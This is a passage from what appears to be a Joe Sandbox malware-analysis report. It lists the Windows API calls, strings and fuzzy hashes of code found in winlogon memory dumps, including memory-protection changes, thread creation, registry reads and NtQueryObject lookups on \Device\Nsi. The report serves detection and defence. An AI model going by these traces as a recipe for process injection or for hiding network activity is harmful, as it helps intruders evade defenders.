                                                    • Part of subcall function 000001CA7D1E3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3EDB
                                                    • Part of subcall function 000001CA7D1E3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F0E
                                                    • Part of subcall function 000001CA7D1E3EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F2E
                                                    • Part of subcall function 000001CA7D1E3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F47
                                                    • Part of subcall function 000001CA7D1E3EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F68
                                                  • CreateThread.KERNELBASE ref: 000001CA7D1E3A8B
                                                    • Part of subcall function 000001CA7D1E1E74: GetCurrentThread.KERNEL32 ref: 000001CA7D1E1E7F
                                                    • Part of subcall function 000001CA7D1E1E74: CreateThread.KERNELBASE ref: 000001CA7D1E2043
                                                    • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2049
                                                    • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2055
                                                    • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2061
                                                    • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E206D
                                                    • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2079
                                                    • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2085
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                  • String ID:
                                                  • API String ID: 2779030803-0
                                                  • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction ID: 5a3ca2a828a2f69e8ddffaa21c5641dcb192bd3c096c6af3b0a23b43865aa00f
                                                  • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction Fuzzy Hash: FD116937E9070982FB66A722A549FE932A0BF84B4FFC000199406C11D0EF3BC58587D3

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                  • String ID:
                                                  • API String ID: 3733156554-0
                                                  • Opcode ID: 50caac35bfbc2d5f59ac81492b3b3ec34dc9555305fb9744858cadce20ffe8b5
                                                  • Instruction ID: d66c06046afa48536f3f5d6c761f082350603e171004f0d7298866914a91c0bf
                                                  • Opcode Fuzzy Hash: 50caac35bfbc2d5f59ac81492b3b3ec34dc9555305fb9744858cadce20ffe8b5
                                                  • Instruction Fuzzy Hash: BAF01237658B4880F6319B05E451B8A77A1FB887D9F544111BACD07769CA3AC580CB82

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 000001CA7D1E1724: GetProcessHeap.KERNEL32 ref: 000001CA7D1E172F
                                                    • Part of subcall function 000001CA7D1E1724: HeapAlloc.KERNEL32 ref: 000001CA7D1E173E
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17AE
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17DB
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E17F5
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1815
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.KERNELBASE ref: 000001CA7D1E1830
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1850
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E186B
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E188B
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E18A6
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E18C6
                                                  • SleepEx.KERNELBASE ref: 000001CA7D1E1BDF
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E18E1
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1901
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E191C
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E193C
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1957
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1977
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1992
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.KERNELBASE ref: 000001CA7D1E199C
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                  • String ID:
                                                  • API String ID: 948135145-0
                                                  • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction ID: 7242aede8837696ec19541534e1c3dce86efc3bfd9bee90a47d931ad18d557f5
                                                  • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction Fuzzy Hash: D5312177A8070941FB529B22E940BE933A5BF44BC9F8A44618E0AC7295EE12C4D093F7

                                                  Control-flow Graph

                                                  control_flow_graph 410 1ca7d29f370-1ca7d29f39f VirtualProtect
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction ID: 63877a1f626742783a368f55fc0a60ee853d92ff197a70e3001fe82e698bde16
                                                  • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction Fuzzy Hash: B8D0C936B3165483F3019B11D855BD66228FB98705FC04009E949826949F7DC25ACB92

                                                  Control-flow Graph

                                                  control_flow_graph 409 1ca7d21f370-1ca7d21f39f VirtualProtect
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction ID: 96736f0284182aa4837be0ebcb41d10c413a553dbe389820e9d30482321e3cc7
                                                  • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction Fuzzy Hash: CFD0C936B3164483F3019B11D845BD56228BB98705FC04005E949826948F7DC25ACB92

                                                  Control-flow Graph

                                                  control_flow_graph 408 1ca7d1ef370-1ca7d1ef39f VirtualProtect
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction ID: bead2ac1358e17f089f294fb4c756c1d3e3800fd4e757aed294e48ae8c095ac3
                                                  • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction Fuzzy Hash: 58D01236B32644C3F301DB51D855BD67729FB98705FC04005E94982694DF7DC259CF92
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: 1b76cae57bb5ede7a876367774aa743c8adcc59447000feee719665bdef6a494
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: 2EB17033A5879886FB568F25D400BDAB3A5FB84B99F845016DE09677A4DE36CC42C3C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: c99db775f95ad49f63960b31de7368144e072af91cd50a58f6ca275a580b9347
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: 26B16F33A5479882FB669F25D400BD9B3A6FB44B98F94901AEE0953794DA37CD42C3C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: 4dfdd766fcca42df98d61a964e565b1f4d34243f24fb4b18c15cbeb28bb14d75
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: 4EB16D73A5079982FB5A8F26D400BD9B3A5FF44F8AF845016EE4993795DE36C980C383
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction ID: b325f62a8c6918293bf4545d48a3dff6da009b34d28f8e70c2f43cb220add978
                                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction Fuzzy Hash: 2E31B073600B8486FB618F60E840BEE7360FB84708F84402ADA4E4BB94DF39C149C792
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction ID: b08fb8c50f464ed379093d9854270921c734b56c222001deaac93b1b99a5f4bc
                                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction Fuzzy Hash: 65319273604B8496FB618F60E880BED7370FB84758F84812ADA4E47B94DF39C649C796
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction ID: e36a2929517430e398b6d0cc2adb5a53015578127c4b9c6c466daf903339ad4f
                                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction Fuzzy Hash: FF319E73645B84C6FB618F60E850BEE7360FB84748F84412ADA4E47B99EF39C648C752
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction ID: 3da2407669b8f480f8f756b28b7d9b8c2941b422362866d82381332b9e319530
                                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction Fuzzy Hash: 3B419B33654B8486EB61CF24E8407DE73A4FB88758F940215EA9D47BA8DF39C156CB82
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction ID: e21dcb0928847e0ad1ab47b3b2793bd05313454e03d703009cfb91f4e3bedbc5
                                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction Fuzzy Hash: FD41C537614F8486E761CF24E8407DE73A4FB88758F904119EA9D47B94DF39C146CB82
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction ID: 4d4afe448e738d7e3fa105810fe858d9c604cd282fc7a32b4601bf5b3b83ad03
                                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction Fuzzy Hash: 4541AC33654B8486FB61CF24E840BDE77A4FB88758F900225EA8D47B99DF39C245CB42
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction ID: fa24c3d413903ccc1a3935427bc08479c9ec404d9b3963e817dc7376bfee203b
                                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction Fuzzy Hash: 7FA1E433B4478849FB229B759448BED7BA0FB8179DF9841159E4837699CA36C043E7C3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction ID: 45d124b7b65d76756e98c7d09d685b6f4212555c67c952a88febd89221c6fea2
